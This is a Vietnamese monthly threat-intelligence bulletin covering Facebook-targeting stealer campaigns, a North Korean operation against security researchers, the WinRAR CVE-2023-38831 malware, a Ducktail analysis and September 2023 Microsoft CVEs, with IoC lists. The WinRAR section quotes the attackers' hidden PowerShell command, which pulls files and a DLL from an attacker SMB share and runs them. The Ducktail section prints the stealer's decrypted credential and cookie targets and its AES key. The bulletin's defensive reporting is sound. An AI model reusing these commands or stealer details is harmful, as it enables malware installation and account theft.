Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết

1        Các mối đe dọa nâng cao – Advanced Threats

1.1      Chiến dịch phishing MrTonyScam triển khai Python-Based Stealer qua Facebook Messenger

Một chiến dịch tấn công phishing qua Facebook Messenger vừa được đội ngũ Guardio Labs phát hiện nhắm mục tiêu chiếm đoạt các tài khoản Business trên nền tảng Facebook. Chiến dịch tấn công được đặt tên MrTonyScam. Nhóm tấn công được xác định đến từ Việt Nam, thực hiện gửi các tin nhắn có chứa file nén đính kèm bên trong là mẫu Python-based stealer được triển khai multi-stage và có sử dụng các phương thức obfuscation.

Các nạn nhân sau khi bị lừa click vào file RAR hoặc ZIP đính kèm trong tin nhắn, sẽ giúp tải về payload tiếp theo từ 1 repository Github hoặc GitLab. Payload này là 1 file nén khác có chứa 1 file CMD, từ đó khởi chạy mẫu Python-based stealer đã được obfuscated nhằm đánh cắp toàn bộ cookies và thông tin đăng nhập trên các trình duyệt web của nạn nhân. Dữ liệu sau đó được gửi qua 1 Telegram hoặc Discord API endpoint của nhóm tấn công. 1 điểm đáng chú ý là sau khi lấy cắp dữ liệu, nhóm tấn công thực hiện xóa toàn bộ cookies trên máy nạn nhân, khiến nạn nhân bị đăng xuất khỏi toàn bộ các tài khoản, từ đó sử dụng cookies chiếm được tiến hành hijack phiên truy cập, đổi mật khẩu và chiếm toàn bộ quyền trên tài khoản nạn nhân.

Nhóm tấn công được cho là đến từ Việt Nam nhờ kết quả phân tích phát hiện việc sử dụng ngôn ngữ tiếng Việt trong source code của mẫu Python stealer và cả việc sử dụng Cốc Cốc, 1 trình duyệt web Chromium-base phổ biến ở Việt Nam.

Các nạn nhân trong chiến dịch được xác định ở Mĩ, Úc, Canada, Pháp, Đức, Indonesia, Nhật Bản, Nepal, Tây Ban Nha, Phi-líp-pin và Việt Nam.

Indicators of Compromise (IoCs)

Malicious Code Hosting Git Repos

gitlab[.]com/alibaba2023

gitlab[.]com/brum

gitlab[.]com/xjnhzaj12b2

github[.]com/xjnhzaj12b1

github[.]com/hahahoho9

Domains

shoppingvideo247.com

Filename Samples

video-86-6p3wlfNcq3eV4ZVleoZZ-22100-18228.rar

ordered-products-VJi85uO5oOH4oD1fV6Px-22100-45036.rar

image_photo-36e671a6581cd099da8c0c9ed381e8888.rar

imɑɡᴇ-ρһᴏтᴏ-The-model-nᴇеԁеԁ-fоr-рurсһаѕе-adQhGSE3JOMBnptP3N7Y-22100-39448.rar

obraz-produkt-1615448759625_19599_4e232787b5053ac7f631b0c701d2159c_1.rar

product-list-for-Aug-2023-Kxl3A3HfLMbcDGdiTKMC-22100-30560.rar

imɑɡᴇ-ρһᴏтᴏ-pгodᴜct-scгeensһot-tZURtXCh5q2T2iDxAybe-22100-60540.zip

This-sample-GFjnFHhCZpYlP4nh5BXJ-22100-49236.rar

video-86-WDN5RYLLjBMP3gJ7AgPT-22100-85277.rar

New-product-pictures-xjuMkFdRwYLJurDlKlje-pmd-378400_n.rar

product-ordered_ixt6RyDk8Fj7VtBksriU-22100-47922.zip

image-product-103c3e2d4se43234ed22c19d3f47611e2e.rar

This-sample-dHRdSIfisNjwUYjUa6Do-22100-45138.rar

picture-was-taken-png_359471865_813853506964504_n.rar

Photo-Images-Product-Samples-2023-4-8.rar

Photo-images-Product-samples_2023-07-21-58.rar

This-sample-dHRdSIfisNjwUYjUa6Do-22100-45138.rar

𝖨mаɡе_оf_рrоԁuсt_9127хz-hp21y0MzqzbNKFplSJe2-22100-6718.rar

photo_2023-04-16_05-20-18-Q3hEwdwih6cAPyRiBAh0-22100-3252.rar

New-product-pictures-JC0bYRqCTC0h3FnSEaL7-pmd-902498_n.rar

Bestellinformationen-und-Fotos-fehlerhafter-Produkte.rar

video-86-W4Coe9eY9hyvxYr4odD6-22100-54438.rar

image-product-103c3e2d4se43234ed22c19d3f47611e2e.rar

photo_2023-04-16_05-20-18-RaYrfdEMiTAlpUgc6VVf-22100-91086.rar

photo_2023-04-16_05-20-18-SGFL0BAs67rrav0oNSFT-22100-15765.rar

imɑɡᴇ-ρһᴏтᴏ-The-model-nᴇеԁеԁ-fоr-рurсһаѕе-tX3HmHpSEpfYBcJr5ypF-22100-63274.rar

Photo_Image_Store-ro5Ws3sCB8sUo1jV9O32-22100-28797.zip

image_photo-36e671a6581cd099da8c0c9ed381e8888.rar

Images-Product_-3qs2xFGs96gi0tPddBV9-pmd-110434_n.rar

ordered-products-5Qnmx5w892JdQXGfTUfd-22100-25783.rar

photo_2023-08-16_05-20-18-CQWWKfldyrtIJcnYn1VM-22100-83264.rar

Images-Product_-kou2rNRKCOTaMtwWoQC9-pmd-284023_n.rar

Рооr-ԛuаⅼ𝗂tу-рrоԁuсt-nоt-аѕ-аԁvеrt𝗂ѕеԁ-7QqMqYZUXooQQ2PgDynu-22100-46392.rar

Product-pictures-2ETLmZJ0QMmXCvGFkX2B-pmd-307902_n.rar

Images-Product_ivUPMdMK3xkwM2eLFSdz-22100-74478.zip

photo_2022-12-08_22-35-30-IAcEYRly1XkstokOp4qM-22100-56726.rar

image_photo-36e671a6581cd099da8c0c9ed381e8888.rar

Información-de-pedido-y-fotos-de-productos-defectuosos.rar

Screenshot-of-the-product-to-buy-JrX1pW2UR1YIWc2dHsEH-22100-79154.zip

File Hashes Samples

a39f0c56dd602fcc14adcdeaa31c21d389af8ea8abcb89862fac19e2807c799d

c8af31d897d7e2ee9babb6a60dec5b65fc4b018e4ce8da6a5d8008ce5926bd54

1af8a147d6e77ffcbf8e5dda14b32c715c4149b5e1c933fa69e451600ecfbf8e

bca1c784742fc086d381f4e1e4495941626d1b829147d0d5f6d3f47af78364dd

3b0424a252a5cbadbb870907ed3c118cafc01ae86382f1775de5b9bc6cc3bce3

c116663954c00ef7be0ce7d391bed95fe0c1f775b97652906c49ec3fcd814719

3b99507af4fd76810ec8224122bc3701f7f2ef2cfa9677d012854df3abd44f5c

3f302fb736164983f04a9ebb8e2ab5604bb92380e8ccac8b160698fb02ccaebd

aaa953d2e18d4620a4a6e60c42f67a6e07cab05eec50e6e8f16f19cfa7c1d13b

9f1711a6157ba51b8e464ff4659c3a1db036e2e93721263e0091ed6fe53bf503

c93a22032bf5cf29ed22065ce572caca41152281852f8b81e034e1e64f4057f4

54cf73082944d966e232d74c33f0cd4e05411846d57fab35171369910be84eb1

93b023813d763ab355b82a3ce7693dbd668d80c3f0034fedbe16a5c44509f250

1c8482f6df65440bf98fdceddac178e841bc801f591de6b060c45b50136dff1f

10372d23b54e550926e59ec359aadf5180e9839cf20086473422d55b444353d6

9dd9cc235f8c2c753529955a351805e01229cc5052932561b0b96344537ce46c

e7cd3233fd39175970675135dac2c582382747b328b3786f8a833ae2ab8f4239

b14a6391e11fe1e2bbf9972e5fefb7579bfcb4177acf60bcf1fc39fdacd1ddfa

4883379040196cb4362ed4dfe4c011512febbfac7217e029f107b62c9acce6df

c95694003557ed3e22b29215ed8ee53c8560a1fbdc5ccce53aa3442aaf116a7e

098672353240df8cbbb7487ad1e3df3e25ceae3ad1dc84e451f03b803183e86a

377d76add32b18c33c0ade90cb355a1e9f0ead3b9a7060f56557fb1fe1b39434

aa3fde3269b630ce09e882ed0224b2271ebda197f5e5e4beb69994e9fc8ddc44

57ecb84193e327b58a62663d5e34d96503bbd81c461f91780b4f6bdb9fc4aabf

548acae9620f6541fa647dcbfe7ed2f3d9637f228b24bfcb0c7d17f34e83b8e5

474d1dcec292401ade40bd90a95b872e5ab2c8fb68737b786e4308444d3ad33a

91dff3d1e940290529d064a0b13e190e6231679ea067df399de559d5bd071d81

171169cf8c15ae6404f3849274fdbbe0cabc4f3ec0b65a3441228b1dbe31a0d6

e3579f1112a695c5117dff5830ef64bf47703943e7ee7dbd32086c7865fcf126

d0237b6e1ab07c8300ad282ed3aa1f6e0e90220d893bbeee26786e886cedb9ad

12444acca1f75247e756516a5d3ca2a33d67641f0664c00c3220f141b3dd8ce1

3bf11184b67b82e367d36cb9ed3380a43814b000d84aef0bb89d4e08e4fcd581

0ed36afbfe255076e759c8fe4dca89b0e0d0de82c4ffd822f4f589f8b0f39688

97252bdb029fcdc9cfda86688a6327f76ea780761a3c1736db6a368ea30ffa14

82c29d1bbb6ef9f3aff4d3ca91f3ec6dfc17018ec0e6da32d080658a19502db6

463a5ad91dd8adc56d700c059770de8ee01b3ba5bc276d17db872cc69d6768bf

1.2      Chiến dịch DUCKPORT của nhóm tấn công Việt Nam nhắm đến các tài khoản Meta Business

Đội ngũ WithSecure Intelligence vừa qua đã công bố 1 báo cáo về chiến dịch DUCKPORT của 1 nhóm tấn công được cho là đến từ Việt Nam. Chiến dịch này nhắm đến các tài khoản cá nhân và doanh nghiệp đang hoạt động trên nền tảng Meta Business/Ads, có nhiều điểm tương đồng với chiến dịch DUCKTAIL cũng được WithSecure phát hiện trước đây.

Delivery mechanism

Nhóm tấn công thực hiện lây nhiễm mã độc bằng việc gửi các file nén (thường được lưu trên các dịch vụ lưu trữ file như Dropbox) qua LinkedIn và Whatsapp, giả mạo các dự án, sản phẩm, cơ hội nghề nghiệp liên quan đến quảng cáo và thương mại điện tử. Các thương hiệu và công ty mà DUCKPORT giả mạo bao gồm:

Brand/Company name

Louis Vuitton	La Roche Posay	McCann
Hyundai	Bandai Namco	Nike
Lamborghini	Ducati	Avalon Organics
Red bull	Samsung	Nivea
NARS	NZXT	Rolex

Nhóm tấn công cũng thực hiện đăng kí các trang web giả mạo thương hiệu thông qua 1 dịch vụ đăng kí URL dạng rút gọn có tên Rebrandly, với các đường dẫn như:

• hyundaimotorjob[.]social/HRM
• brandrecruiter[.]social/HyundaiMotor
• brandrecruiter[.]social/NARSCompany
• brandresource[.]social/NarsCosmetics
• recruiterofbrand[.]social/NARS
• narscosmetics[.]social/jobinformation
• nars[.]social/HRM
• recruitmentagency[.]social/Lamborghini
• mccann[.]expert/McCANN-Advertising_project_2023
• guessinc[.]work/project
• samsungagency[.]link/service-marketplace
• nike-agency[.]link/us-job
• marketing-project[.]social/nike-agency

Malware capabilities

Kết quả phân tích cho thấy source code của mã độc DUCKPORT được dựa trên DUCKTAIL, nhóm cũng bổ sung thêm nhiều tính năng mới, đồng thời cải tiến 1 vài chức năng chính với phương thức triển khai và phong cách viết code khác.

Các chức năng chính được phát hiện trong mẫu mã độc bao gồm:

• Thu thập thông tin máy nạn nhân thông qua WMI, bao gồm:
  • Username
  • Hệ điều hành
  • Phiên bản hệ điều hành và bản vá
  • Tên CPU
  • Tên GPU
  • Kích thước RAM
  • Hardware UUID
• Thu thập thông tin địa lý và User agent
• Thu thập thông tin truy cập web, bao gồm:
  • Thông tin đăng nhập
  • Lịch sử duyệt web
  • Lịch sử download (có trên 1 vài phiên bản mã độc cũ)
• Meta Business account hijacking: bên cạnh các tính năng tự động tạo và công bố các nội dung, chiến dịch quảng cáo lừa đảo, DUCKPORT còn bổ sung thêm khả năng leo thang đặc quyền và truy cập security credentials
• Chụp ảnh màn hình máy nạn nhân và gửi đến máy chủ C2 (Telegram)
• Mở kết nối đến máy nạn nhân qua Internet với 1 địa chỉ URL public
• Sử dụng các dịch vụ note sharing onlie để gửi câu lệnh đến máy nạn nhân

Tương tự như DUCKTAIL, DUCKPORT cũng sử dụng Extended Validation (EV) code signing certificates để thực hiện kí cho các mẫu malware của nhóm. Nhóm đã sử dụng 3 chứng chỉ được mua cho 2 công ti của Việt Nam thông qua SSL.com, trong đó có 1 chứng chỉ được phát hiện cũng dùng để kí cho các mẫu malware thuộc 1 chiến dịch tấn công người dùng Facebook và lây nhiễm mã độc Redline stealer.

Indicators of Compromises (IoCs)

Thông tin đầy đủ về danh sách IoCs tham khảo tại link: https://github.com/WithSecureLabs/iocs/blob/master/MeetTheDucks/iocs.csv

1.3      Chiến dịch của Triều Tiên nhắm vào các nhà nghiên cứu bảo mật

Vào đầu năm 2021, Nhóm Phân tích Mối đe dọa đã từng xác định và báo cáo một chiến dịch nhắm mục tiêu vào các nhà nghiên cứu bảo mật đang nghiên cứu và phát triển mã khai thác lỗ hổng tại các công ty và tổ chức khác nhau. Để tạo dựng uy tín và kết nối với các nhà nghiên cứu bảo mật, kẻ tấn công đã xây dựng một blog với các chủ đề về nghiên cứu lỗ hổng bảo mật và tạo nhiều tài khoản Twitter để tương tác với các researcher tiềm năng. Các tài khoản Twitter này đăng các bài đăng về PoC khai thác lỗ hổng bảo mật, đồng thời cũng liên kết tài khoản đến các blog tồn tại lỗ hổng 0-day. Nhằm tăng độ tin cậy, kẻ tấn công sẽ sử dụng các tài khoản Twitter khác chia sẻ lại bài đăng.

Gần đây, Nhóm phân tích mối đe dọa đã phát hiện một chiến dịch mới. TAG cho rằng có ít nhất một lỗ hổng zero-day đang được nhóm tấn công sử dụng nhắm mục tiêu vào các nhà nghiên cứu bảo mật. Lỗ hổng này đã được báo cáo tới hãng có sản phẩm bị ảnh hưởng và đang trong quá trình thực hiện phát triển bản cập nhật.

TAG nghi ngờ cả hai chiến dịch bắt nguồn từ các nhóm tấn công được hậu thuẫn bởi chính phủ Triều Tiên do có những điểm tương đồng về việc sử dụng mã khai thác và shellcode.

Nhóm tấn công sử dụng nền tảng mạng xã hội như X (trước đây là Twitter) để xây dựng mối quan hệ với các mục tiêu. Trong trường hợp ghi nhận, các cuộc trò chuyện kéo dài hàng tháng, nhóm tấn công cố gắng hợp tác, trao đổi về các chủ đề mà cả hai cùng quan tâm. Các cuộc trò chuyện sẽ dần được chuyển sang ứng dụng nhắn tin được mã hóa như Signal, WhatsApp hoặc Wire. Khi mối quan hệ được phát triển và xây dựng được sự tin tưởng đối với nhà nghiên cứu bảo mật, kẻ tấn công sẽ gửi một tệp độc hại chứa ít nhất một lỗ hổng zero-day trong các package của một số phần mềm phổ biến.

Actor-controlled Twitter profile

Sau khi khai thác thành công, shellcode thực hiện kiểm tra các phần mềm ảo hóa, sau đó thông tin được thu thập cùng với ảnh chụp màn hình sẽ được gửi tới máy chủ C2. Shellcode được sử dụng trong lần khai thác này được xây dựng theo cách tương tự như shellcode được thấy trong các lần khai thác trước đây của nhóm tấn công Triều Tiên.

Cách thức tấn công khác

Bên cạnh việc sử dụng các lỗ hổng 0-day, threat actor cũng phát triển công cụ trên môi trường Windows. Công cụ được sử dụng để hỗ trợ cho việc định dạng được các symbol từ nhiều nguồn khác nhau như Microsoft, Google, Mozilla và Citrix, giúp dễ dàng hơn trong quá trình phân tích, dịch ngược mã nguồn (Reverse Enginers) cũng như quá trình nghiên cứu lỗ hổng. Mã nguồn của công cụ này được xuất bản lần đầu tiên trên GitHub vào ngày 30 tháng 9 năm 2022, kể từ đó một số bản cập nhật đã được phát hành. Công cụ này có khả năng tải xuống và thực thi mã tùy ý từ máy chủ C2 server do kẻ tấn công kiểm soát.

Github repository for GetSymbol

Actor controlled sites and accounts

GetSymbol:

• https://github[.]com/dbgsymbol/
• https://dbgsymbol[.]com
• 50869d2a713acf406e160d6cde3b442fafe7cfe1221f936f3f28c4b9650a66e9
• 0eedfd4ab367cc0b6ab804184c315cc9ce2df5062cb2158338818f5fa8c0108e
• 2ee435bdafacfd7c5a9ea7e5f95be9796c4d9f18643ae04dca4510448214c03c
• 5977442321a693717950365446880058cc2585485ea582daa515719c1c21c5bd

C2 IPs/Domains:

• 23.106.215[.]105
• www.blgbeach[.]com

X (formerly Twitter) Accounts

• https://twitter.com/Paul091_

Wire Accounts

• @paul354

Mastodon Account:

• https://infosec.exchange/@paul091_

2        Malware

2.1      Phân tích các mẫu mã độc khai thác lỗ hổng trên sản phẩm Winrar nhắm mục tiêu đến Việt Nam.

Cuối tháng 8, nhóm nghiên cứu của Group-IB đưa ra thông tin các nhóm tấn công lợi dụng lỗ hổng CVE-2023-38831 để khai thác tấn công. Threat Intel của NCS cũng liên tục thực hiện hunting và thu được một số mẫu mã độc, sau quá trình phân tích, chúng tôi nhận định các nhóm tấn công nhắm mục tiêu tới Việt Nam

Một tệp tin có tên “CV.rar” được upload lên Virustotal từ khu vực Việt Nam, tệp tin thực hiện khai thác lỗ hổng CVE-2023-38831 nhằm tải xuống và thực thi các mã độc khác trên máy nạn nhân bị ảnh hưởng

Bên trong tệp tin nén “CV.rar” chứa file “CV.pdf” và một folder cùng tên chứa tệp tin bat độc hại.

File bat – CV.pdf .cmd thực hiện:

• Sao chép file CV.pdf từ đường dẫn \\111[.]90.151[.]233\share vào thư mục public và khởi chạy nhằm lừa nạn nhân.
• Copy file bat ở cùng đường dẫn vào thư mục Startup. SoftwareUpdate.bat thực hiện gọi rundll32.exe thực thi clean.dll với export function Entry.
• Thực thi file có tên dll sử dụng rundll32.exe

ECHO Off

powershell -w hidden -c “copy \\111[.]90[.]151[.]233\share\CV.pdf C:\Users\Public\CV.pdf;start C:\Users\Public\CV.pdf;

copy \\111[.]90[.]151[.]233\share\SoftwareUpdate.bat ‘C:\Users\%USERNAME%\Start Menu\Programs\Startup\SoftwareUpdate.bat’;

rundll32 \\111[.]90[.]151[.]233\share\clean.dll,Entry”

Thông qua việc thử truy cập đến máy chủ lưu trữ các file độc hại, chúng tôi thu được nhiều file script .bat hoặc .ps1 có nhiệm vụ tải thêm mã độc mới.

Trên máy chủ lưu trữ, bên cạnh các tệp tin độc hại, chúng tôi cũng phát hiện các tệp tin pdf khác, nội dung file chứa thông tin nghị định mới ban hành từ Văn phòng Chính Phủ. Chúng tôi nghi ngờ các file decoy này có thể được sử dụng trong các chiến dịch khác tấn công vào bộ ban ngành tại Việt Nam.

Phân tích DLL

Clean.dll được pack bằng UPX, có nhiệm vụ tạo kết nối tới địa chỉ 113[.]90[.]151[.]233 port 3337, thực thi các câu lệnh thông qua tiến trình cmd.exe với tham số từ kẻ tấn công.

Các thông tin thu thập từ nạn nhân bao gồm IP public (được trích xuất từ trang web myexternalip.com), Computername, Username, OS (Giá trị OS được trích xuất từ trường Productname trong registry tại đường dẫn HKLM\ SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion đối với phiên bản 64bit hoặc trường DisplayVersion tại HKLM\ SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion đối với phiên bản 32bit)

Tính đến thời điểm thực hiện phân tích, 2 trong 3 máy chủ C2 lưu trữ mã độc của kẻ tấn công vẫn đang hoạt động. Bên cạnh máy chủ tại địa chỉ 111[.]90[.]151[.]233, máy chủ C2 megacybernews[.]com cũng lưu trữ các file mã độc với các hành vi tương tự, ngoài ra máy chủ cũng thực hiện xử lý các dữ liệu được gửi từ nạn nhân. Các dữ liệu được gửi lên máy chủ này bao gồm: Domain, thông tin cấu hình hệ thống, thông tin mạng, các tiến trình đang chạy, phần mềm AV đang sử dụng. Toàn bộ dữ liệu này sẽ được encode bằng thuật toán base64 và gửi đến C2 theo POST request, body của request theo định dạng:

            pass = 88145175bb9ef088c61f5ab089701dd7; data=<encode_base64(data)>

Một dll khác có tên log.dll cũng thực hiện gửi dữ liệu với header là PNG, POST requeset với User-Agent là “Mozilla / 5.0 (Windows NT 6.1; WOW64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 96.0.4664.110 Safari / 537.36” tới máy chủ C2: deleted[.]tripadviso[.]online/home

Indicators of compromise (IOCs)

File:

CV.rar

MD5: ad501b42c68456dad115a7e04c41940e

SHA256: c6dd76e7e4934dc92bc05f4e945f53c00259eefe0176be136add0bd3da1974a9

CV.pdf.cmd

MD5: cf539ffc1464970976cb074d14ff8b59e3737971a6e3415078009b26391e9bc8

SHA256: cf539ffc1464970976cb074d14ff8b59e3737971a6e3415078009b26391e9bc8

clean.dll

MD5: dca060abc6b296b03155e1ddaddb9b81

SHA256: 393c71f69d9a255f21994befd7dcc334ea654da54be17a92218f7c4b54a31ee5

CV_TranThiThuyPhuong.pdf (Decoyfile)

MD5: a62702ddbff309182cebc32ecbc15230

SHA256: 210b0c0d455785733070f9fbd7309073ef0d86ae8a7ca0b609db7e964d5eb7dc

CV.pdf (Decoyfile)

MD5: 40bd6520ad3aaed2405a2c844377f98e

SHA256: 044aa01942bf7aacf04558a3d44b11707ba665376223f8ec871b1f83f8d1032c

44_2023_ND-CP_30062023_48234234.pdf (Decoyfile)

MD5: 9db7ab440fab8f6c9c91ad1ada5dafee

SHA256: 66dcb4b9f6b06aa6d0d9e1229958b6cfea8cc81ab5a877f4883f99a64d7e5f4b

init.ps1

MD5: dd5904fba6ed4e7e1c333b8b63811804

SHA256: 9c2069f2b2fe8241495d83040b642ff074e1e5944f4b136cb8865171f6fba881

log.dll

MD5: 9a364d560888ac6f26f8f1ce9ec90215

SHA256: b0fcdb0f5cf1786b6aded5497400b342b4306db34068588de3b2415e90084f19

newran.jpg

MD5: 259bb86d43b7f359f8225b808570261a

SHA256: 72d44cd49b085385fad1e1d5a80f12d0d2df9e811352f5a25d236f240b6221f7

newrun.bat

MD5: 8b4416f938167114c67d49b9544450bf

SHA256: b461409f727522c008cd69306b17d7fa5b9cca468b994c7ee97ec0ddbdeb6f95

SoftwareUpdate.bat

MD5: 0a278662a224dae896322ab8ce0445a9

SHA256: 56bf259fd5e1947857c4d464b437a02bd7a060af179673fe13256fbae425cb13

stage2.2.ps1

MD5: 0bc20f3de037349ae54e1c5c11bd9f78

SHA256: 2eff93085135cd6f18f431fe126b5368296112df7feef047be5c6e691adce862

getdata.ps1

MD5: 309a64dcfa3c580209a6dfd5a0759b36

SHA256: 55aa30a574592d6005f4f570a47c8fafaee98b7d709c6eacd549870db793ebbd

init.txt

MD5: f596138e4e59f1ded2714e4b44d408ed

SHA256: 4c805f281923ffc2214f4fe48f31ea392b13b710969a18ad6b6b561744cd3875

ran.bat

MD5: c2f1e1201c2053da678b5dcca25f0bd1

SHA256: bd59bbdaa7c3ba995b492e013fc6fb945f99a47d0ffbb7ecee694fa0b08b1653

run.bat

MD5: a19fe50329633bae519220dcd4b0e432

SHA256: 1028bb298dc5f10b31a55528487290f0ee4b0df87f8989d1a5aad359c26c69b0

runner.dll

MD5: 8e13fd24abb754a9f65ebb55e5ff0725

SHA256: 9479812f6f7c39170af9b7a760956d1f33410b5b3a20808db6dca36d4c395a1f

stage2.ps1

MD5: 23a65399c657fccb994ec035360a770a

SHA256: 9b5bf5861d31cbc11551b1bed0a5bd8791ab5b8a90333a15e92d1ba72453ec8e

C2:

111[.]90[.]151[.]233

111[.]90[.]143[.]37 (không còn hoạt động)

megacybernews[.]com

deleted[.]tripadviso[.]online

URL:

111[.]90[.]151[.]233\share

hxxp[:]//megacybernews[.]com/checkin.php

hxxp[:]//megacybernews[.]com/test.txt

deleted[.]tripadviso[.]online/home

User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 96.0.4664.110 Safari / 537.36

2.2      Phân tích mã độc stealer Ducktail

Ducktail là mã độc infostealer, phát triển bằng ngôn ngữ .NET. Mã độc được kẻ tấn công sử dụng với mục đích chiếm đoạt các tài khoản business accounts trên các trang mạng xã hội như Facebook để chạy quảng cáo nhằm thu lợi nhuận. Ducktail sử dụng thuật toán Base64 và mã hóa AES để ẩn dấu các chức năng chính.

DLL có kích thước lớn (72.66 MB), trong đó phân vùng overlay chứa các padding null bytes và header của PE file nghi ngờ. Dump phân vùng này thu được PE file .NET và thực hiện phân tích với dnSpy

Method Start() sẽ xử lý chính các nhiệm vụ trong DLL thông qua việc gói tới các method khác:

Method Open() có nhiệm vụ lấy data từ resource có tên “c03p1_2” thông qua GetResource method.

Method Execute() thực hiện tạo Mutex có tên “HJASDHJASJHD” sau đó truy xuất data có tên “BUNDLE”

Các chuỗi và dữ liệu bị mã hóa trong binary đều sử dụng cùng cách thức mã hóa giống nhau. Mã hóa với thuật toán mã hóa AES với khóa giải mã “==AUyLZ7aRzyWlgazfkD/hZf” và base64.

Dữ liệu sau khi giải mã resource “c03p1_2” sẽ thu được file decoy định dạng pdf có nội dung mô tả các công việc của Nike

Lưu ý rằng, một số dữ liệu sẽ cần được decode base64 2 lần có được plaintext.

Giải mã thêm dữ liệu bị mã hóa sẽ thu được một PE file mới bị obfuscate bởi SmartAssembly

Sau khi deobfuscate, DLL mới cũng sử dụng cùng thuật toán mã hóa trong method Run() với khóa được lưu trữ của thuật toán AES trong “string_1”

Kết quả sau khi giải mã bao gồm các địa chỉ email, cấu hình kết nối, các chuỗi base64 (trong đó có DLL có tên Telegram.Bot.dll phục vụ cho việc giao tiếp thông qua API) và các đường dẫn URL liên quan đến mạng xã hội facebook (dữ liệu trong ảnh và trong bảng chỉ là một phần của kết quả giải mã):

https://graph.facebook.com/{0}/me/adaccounts?fields={1}&limit=50&access_token={2}

business{id},id,name,balance,currency,amount_spent,adtrust_dsl,funding_source_details{type,display_string},adspaymentcycle{threshold_amount},account_status

https://graph.facebook.com/{0}/me/businesses?fields={1}&limit=50&access_token={2}

https://graph.facebook.com/v14.0/me?access_token=

https://business.facebook.com/settings/ad-accounts?business_id=

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/

 Safari /537.36

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0

Google

Edge

Firefox

Brave

SOFTWARE\WOW6432Node\Clients\StartMenuInternet

SOFTWARE\Clients\StartMenuInternet

Local State

Google

History

Login Data

Cookies

Network

cookies.sqlite

Google

Edge

BraveSoftware

Firefox

Google Chrome

Microsoft Edge

Brave

Mozilla Firefox

URL: {0}

Username: {1}

Password: {2}

URL: {0}

Title: {1}

Last Visit: {2}

https://m.facebook.com/security/2fac/settings/

data-testid=”reauth_password_field”

………………………………………………………………

Indicators of compromise (IOCs)

File Name	Hash (SHA256)
tkfgk435jkdgf.dll	dce2488ddc3ab45fe8df1c2bb3e21cd11d4e697e94e0e2a88b4bfd35c6516055
dump.dll	160d9266fd2df7da4581ab01e87d7c047d4a381c59d35fe1e60f0abe162a915a
dump.pdf (decoy)	99a23191275fc941662faa780118866082f55b70948e97a540e47b7109c8a5c1
Dump2.dll	5dbe336c051a8a4c80886c256aeb4dc9a8411988db4431f239e6d955747e1eee
Telegram.Bot.dll	470b943b90eb1c7618fcee39ddccc1afdc5b84c8014d8a5db9c2002edf8ca7de

 

3        CVE và các khuyến nghị bảo mật

3.1      Microsoft Patch Tuesday – September 2023

Trong tháng 9, Microsoft đã phát hành các bản vá cho 59 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Exchange Server; Office và Office Components; .NET và Visual Studio; Azure; Microsoft Dynamics và Windows Defender. Trong đó có 5 lỗ hổng được đánh giá mức độ Nghiêm trọng, 55 lỗ hổng được đánh giá là Important. Dưới đây là các CVE nổi bật:

• CVE-2023-36761 – Cảnh báo lỗ hổng lộ lọt thông tin | Microsoft Word Information Disclosure Vulnerability

CVSS: 6.2/10

Mô tả: Tồn tại lỗ hổng cho phép kẻ tấn công lợi dụng nhằm tiết lộ các thông tin là các giá trị hash NTML, các giá trị này có thể sử dụng để thực hiện các cuộc tấn công khác như NTLM-relay. Preview Pane là attack vector của lỗ hổng này do đó khai thác không yêu cầu tương tác từ người dùng. Lỗ hổng được Microsoft ghi nhận đang được các nhóm tấn công lợi dụng khai thác.

Phiên bản ảnh hưởng:

Microsoft Word 2013 Service Pack 1 (64-bit editions)

Microsoft Word 2013 Service Pack 1 (32-bit editions)

Microsoft Word 2013 RT Service Pack 1

Microsoft Word 2016 (64-bit edition)

Microsoft Word 2016 (32-bit edition)

Microsoft Office LTSC 2021 for 32-bit editions

Microsoft Office LTSC 2021 for 64-bit editions

Microsoft 365 Apps for Enterprise for 64-bit Systems

Microsoft 365 Apps for Enterprise for 32-bit Systems

Microsoft Office 2019 for 64-bit editions

Microsoft Office 2019 for 32-bit editions

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36761

 

• CVE-2023-38148– Cảnh báo lỗ hổng thực thi mã từ xa | Internet Connection Sharing (ICS) Remote Code Execution Vulnerability

CVSS: 8.8/10

Mô tả: Internet Connection Sharing (ICS) là một dịch vụ trong Windows cho phép một máy tính có kết nối internet chia sẻ kết nối internet này với các máy tính khác trong mạng cục bộ (LAN).

Tồn tại lỗ hổng trên ICS cho phép kẻ tấn công không cần xác thực thực thi mã từ xa thông qua việc gửi các gói tin độc hại tới Internet Connection Sharing (ICS) service. Khai thác lỗ hổng yêu cầu ở trong cùng một mạng (không thể khai thác trên mạng WAN) và ICS phải được sử dụng (enable).

Phiên bản ảnh hưởng:

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38148

• CVE-2023-29332- Cảnh báo lỗ hổng leo thang đặc quyền | Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability

CVSS: 7.5/10

Mô tả: Azure Kubernetes tồn tại lỗ hổng cho phép kẻ tấn công leo thang đặc quyền, chiếm được quyền Cluster Administrator. Khai thác lỗ hổng không yêu cầu tương tác từ người dùng, mức độ phức tạp thấp và có thể truy cập được từ Internet.

Phiên bản ảnh hưởng:

Azure Kubernetes Service

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29332

